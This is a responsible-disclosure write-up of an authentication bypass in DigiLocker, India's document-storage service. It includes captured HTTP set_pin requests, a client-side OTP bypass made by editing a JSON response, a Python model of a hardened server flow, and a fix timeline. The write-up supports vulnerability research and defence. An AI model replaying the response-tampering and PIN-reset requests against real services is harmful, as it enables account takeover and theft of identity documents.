How I got access to 38M+ DigiLocker accounts

Impact

Backstory

So the story starts when my father wanted to upload all my personal documents to DigiLocker, since with it we don’t have to carry our original documents on trains or to airports for verification. There are currently 389 different types of documents officially supported by DigiLocker (Aadhaar Card, Driving License, etc.), but of course you can upload more documents, as each user is allocated 1GB of locker space. I was a little skeptical about doing this, because history has shown numerous instances where Aadhaar documents, along with other documents, have been leaked because of improper security implementation.

Analysis

So I started to have a look at how the authentication mechanism is implemented.

Screenshots from the analysis (captions only; the images are not reproduced here):

  • Sign in request
  • Correct PIN gives back the username
  • Incorrect PIN response
  • Incorrect PIN cannot request the Aadhaar profile
  • OTP during sign up process
  • Random OTP
  • OTP verification request
  • OTP verification response

{"status":"success","username":"xxxxxxxx"}

POST /signup/set_pin HTTP/1.1
Host: accounts.digitallocker.gov.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://accounts.digitallocker.gov.in
Connection: close
Referer: https://accounts.digitallocker.gov.in/signup
Cookie: SRVNAME=S4; fpdglckr=; DLOCKER=<redacted>
&pin=xxxxxx&txn=<username>&flow=signup

Extra Weirdness

As we remember, when we bypassed the OTP and modified the response, it looked like this:

{"status":"success"}
POST /signup/set_pin HTTP/1.1
Host: accounts.digitallocker.gov.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://accounts.digitallocker.gov.in
Connection: close
Referer: https://accounts.digitallocker.gov.in/signup
Cookie: SRVNAME=S4; fpdglckr=; DLOCKER=<redacted>
&pin=xxxxxx&txn=undefined&flow=signup
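In the captures above, the browser's view of the OTP step is a JSON response it can edit, and the set_pin request carries the username itself as txn (or undefined once the OTP response has been tampered with). The model below is an added illustration written for this page, not DigiLocker's code: it keeps the OTP result and the txn-to-username binding on the server, so neither an edited response nor a txn of undefined or a bare username can reach set_pin, and profile data is released only against a server-issued session. Endpoint and parameter names (set_pin, pin, txn, flow=signup) follow the captured requests; the storage, OTP delivery, attempt limits, session tokens and the 6-digit PIN rule are assumptions.

```python
"""Server-side model of a signup (OTP -> set PIN) and sign-in (PIN) flow.

Added example, not DigiLocker's code. Names set_pin/pin/txn/flow=signup follow
the requests captured on the page; everything else is assumed.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass
class SignupTxn:
    """Server-side record of one signup; the client only ever holds txn_id."""
    username: str
    otp_hash: bytes
    otp_verified: bool = False
    otp_attempts: int = 0


@dataclass
class Account:
    salt: bytes
    pin_hash: bytes
    failed_logins: int = 0


def _otp_digest(txn_id: str, otp: str) -> bytes:
    # OTPs are short-lived; an HMAC keyed by the random txn id is enough here.
    return hmac.new(txn_id.encode(), otp.encode(), hashlib.sha256).digest()


def _pin_hash(pin: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, 100_000)


class AuthServer:
    MAX_ATTEMPTS = 5  # assumed lockout threshold for OTP and PIN guesses

    def __init__(self) -> None:
        self.txns: dict[str, SignupTxn] = {}      # txn id -> signup state
        self.accounts: dict[str, Account] = {}    # username -> PIN record
        self.sessions: dict[str, str] = {}        # session token -> username

    def start_signup(self, username: str) -> tuple[str, str]:
        """Issue an opaque txn id (not the username) and a random 6-digit OTP.
        The OTP would go out of band (SMS); it is returned only to drive the demo."""
        txn_id = secrets.token_urlsafe(16)
        otp = f"{secrets.randbelow(10**6):06d}"
        self.txns[txn_id] = SignupTxn(username, _otp_digest(txn_id, otp))
        return txn_id, otp

    def verify_otp(self, txn_id: str, otp: str) -> dict:
        """The result is recorded in txn.otp_verified on the server; the JSON
        the browser receives is informational, so editing it changes nothing."""
        txn = self.txns.get(txn_id)
        if txn is None or txn.otp_attempts >= self.MAX_ATTEMPTS:
            return {"status": "failure"}
        txn.otp_attempts += 1
        if hmac.compare_digest(txn.otp_hash, _otp_digest(txn_id, otp)):
            txn.otp_verified = True
            return {"status": "success"}
        return {"status": "failure"}

    def set_pin(self, txn: str, pin: str, flow: str) -> dict:
        """/signup/set_pin: accepted only for a known txn whose OTP step has
        completed server-side. 'undefined' or a username is not a known txn."""
        rec = self.txns.get(txn)
        if flow != "signup" or rec is None or not rec.otp_verified:
            return {"status": "failure"}
        if not (pin.isdigit() and len(pin) == 6):  # assumed PIN policy
            return {"status": "failure"}
        salt = secrets.token_bytes(16)
        self.accounts[rec.username] = Account(salt, _pin_hash(pin, salt))
        del self.txns[txn]  # single use: the same txn cannot set a PIN twice
        return {"status": "success", "username": rec.username}

    def sign_in(self, username: str, pin: str) -> dict:
        acct = self.accounts.get(username)
        if acct is None or acct.failed_logins >= self.MAX_ATTEMPTS:
            return {"status": "failure"}
        if not hmac.compare_digest(acct.pin_hash, _pin_hash(pin, acct.salt)):
            acct.failed_logins += 1
            return {"status": "failure"}
        acct.failed_logins = 0
        token = secrets.token_urlsafe(32)
        self.sessions[token] = username
        return {"status": "success", "username": username, "session": token}

    def get_profile(self, session: str) -> dict:
        """Profile data is tied to a server-issued session, so a client that
        only saw a failure response has nothing valid to present here."""
        username = self.sessions.get(session)
        if username is None:
            return {"status": "failure"}
        return {"status": "success", "username": username}


if __name__ == "__main__":
    srv = AuthServer()
    txn, otp = srv.start_signup("alice")          # constructed demo user
    print(srv.set_pin(txn, "123456", "signup"))     # failure: OTP not yet verified
    print(srv.set_pin("undefined", "123456", "signup"))  # failure: unknown txn
    print(srv.verify_otp(txn, otp))                 # success
    print(srv.set_pin(txn, "123456", "signup"))     # success, username alice
    print(srv.sign_in("alice", "123456")["status"])  # success
```

The point of the model is where state lives: the only thing the client ever chooses is a PIN guess or an OTP guess, and every decision (OTP verified, which username a txn belongs to, who a session belongs to) is read from server-side records that the client cannot name or edit.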

Disclosure

  • 2020/05/16: Reported technical details to DigiLocker
  • 2020/05/18: DigiLocker fixes PIN bypass
  • 2020/06/01: DigiLocker fixes OTP bypass

Credits

Thank you to my friend Osanda for proofreading :)
